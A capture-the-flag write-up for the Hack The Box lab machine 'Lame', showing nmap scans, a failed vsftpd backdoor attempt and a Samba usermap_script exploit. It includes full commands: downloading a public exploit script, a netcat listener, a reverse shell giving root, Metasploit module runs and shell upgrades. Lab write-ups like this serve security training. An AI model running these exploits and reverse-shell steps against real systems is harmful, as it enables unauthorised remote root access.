Lame
This machine gave me an hard time, not the difficulty but a nmap regression on version 7.80. To solve it, I needed to install a machine with nmap compiled from the latest source code.
Contents
Ports scan
This was the first port scan, the samba version is not identified because NSE script failed.
# Nmap 7.80 scan initiated Wed Nov 13 15:38:10 2019 as: nmap -v -sC -sV -p 21,22,139,445,3632 -oN nmap780.txt lame Nmap scan report for lame (10.10.10.3) Host is up (0.072s latency). rDNS record for 10.10.10.3: lame.htb
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.34 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: |_ms-sql-info: ERROR: Script execution failed (use -d to debug) |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) |_smb-security-mode: ERROR: Script execution failed (use -d to debug) |_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Nov 13 15:39:02 2019 -- 1 IP address (1 host up) scanned in 52.27 seconds
With this version of nmap, all the information is there.
# Nmap 7.80SVN scan initiated Wed Nov 13 20:42:26 2019 as: nmap -v -sC -sV -p 21,22,139,445,3632 -oN nmap780GIT.txt lame Nmap scan report for lame (10.10.10.3) Host is up (0.045s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.34 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: |_clock-skew: mean: 2h30m23s, deviation: 3h32m10s, median: 21s | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2019-11-13T15:43:05-05:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/local/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Nov 13 20:43:19 2019 -- 1 IP address (1 host up) scanned in 53.24 seconds
vsftpd 2.3.4
This version of vsftpd has backdoor installed.
root@kali:~/HTB/Machines/Lame/doc# searchsploit vsftpd 2.3.4
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Execut | exploits/unix/remote/17491.rb
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
root@kali:~/HTB/Machines/Lame/doc# searchsploit -p 17491
Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/17491
Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
If we check URL in the exploit file https://www.exploit-db.com/exploits/17491
Normally a shell is launched on port 6200, once a connection is opened.
Opening the backdoor
From a console:
root@kali:~/HTB/Machines/Lame/doc# ftp lame Connected to lame.htb. 220 (vsFTPd 2.3.4) Name (lame:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp>
From a second console
root@kali:~/HTB/Machines/Lame/doc# telnet lame 6200 Trying 10.10.10.3...
But it doesn't work. Perhaps the backdoor is firewalled by the host firewall.
Metasploit try
root@kali:~/HTB/Machines/Lame# msfconsole
msf5 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Samba 3.0.20
root@kali:~/HTB/Machines/Lame# searchsploit samba 3.0.20
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' | exploits/unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | exploits/linux/remote/7701.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
root@kali:~/HTB/Machines/Lame# searchsploit -p 16320
Exploit: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/16320
Path: /usr/share/exploitdb/exploits/unix/remote/16320.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Using the CVE, we find a python script to exploit this vulnerability
usermap_script.py
Installation
root@kali:~/HTB/Machines/Lame# wget https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py root@kali:~/HTB/Machines/Lame# python usermap_script.py Traceback (most recent call last): File "usermap_script.py", line 8, in <module> from smb.SMBConnection import SMBConnection ImportError: No module named smb.SMBConnection https://pysmb.readthedocs.io/en/latest/api/smb_SMBConnection.html root@kali:~/HTB/Machines/Lame# pip install pysmb Collecting pysmb Downloading https://files.pythonhosted.org/packages/90/61/4e08cbd8485f76485e037091a2a0c28caecf0305ea32efb2a0d6d08b797c/pysmb-1.1.27.zip (1.3MB) 100% |████████████████████████████████| 1.3MB 984kB/s Requirement already satisfied: pyasn1 in /usr/lib/python2.7/dist-packages (from pysmb) (0.4.2) Building wheels for collected packages: pysmb Running setup.py bdist_wheel for pysmb ... done Stored in directory: /root/.cache/pip/wheels/9a/db/cd/e9ae94b31b8f7c10345fcff78ebd016bf5697df80268cdfa07 Successfully built pysmb Installing collected packages: pysmb Successfully installed pysmb-1.1.27
Exploitation
root@kali:~/HTB/Machines/Lame# python usermap_script.py [*] CVE-2007-2447 - Samba usermap script [-] usage: python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
Open listener
root@kali:~/HTB/Machines/Lame/doc# nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Run script
root@kali:~/HTB/Machines/Lame# python usermap_script.py 10.10.10.3 445 10.10.14.34 4444 [*] CVE-2007-2447 - Samba usermap script [+] Connecting ! [+] Payload was sent - check netcat !
On netcat console
root@kali:~/HTB/Machines/Lame/doc# nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.3. Ncat: Connection from 10.10.10.3:40344. python -c 'import pty; pty.spawn("/bin/bash")' root@lame:/# ^Z [1]+ Stopped nc -lvnp 4444 root@kali:~/HTB/Machines/Lame/doc# stty rows 24 columns 134 root@kali:~/HTB/Machines/Lame/doc# stty raw -echo root@kali:~/HTB/Machines/Lame/doc# fg nc -lvnp 4444 export TERM=screen root@lame:/# whoami root
Using Metsploit
root@kali:~/HTB/Machines/Lame# msfconsole msf5 > search samba 3.0.20 msf5 > use exploit/multi/samba/usermap_script msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3 RHOSTS => 10.10.10.3 msf5 exploit(multi/samba/usermap_script) > run [*] Started reverse TCP double handler on 10.10.14.34:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo UktlFXns9zNCNuiC; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "UktlFXns9zNCNuiC\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (10.10.14.34:4444 -> 10.10.10.3:51760) at 2019-11-13 17:24:28 -0500 whoami root
User flag
root@lame:/# cd /home/ root@lame:/home# ls -ltr total 16 drwxr-xr-x 2 root nogroup 4096 Mar 17 2010 ftp drwxr-xr-x 2 service service 4096 Apr 16 2010 service drwxr-xr-x 3 1001 1001 4096 May 7 2010 user drwxr-xr-x 2 makis makis 4096 Mar 14 2017 makis root@lame:/home# cd makis/ root@lame:/home/makis# cat user.txt <USER FLAG>
Root flag
root@lame:/# cat /root/root.txt <ROOT FLAG>
References
- Regression smb_enum_users and shares on Nmap V 7.80
- METASPLOIT UNLEASHED – FREE ETHICAL HACKING COURSE
Daniel Simao 22:51, 10 November 2019 (EST)
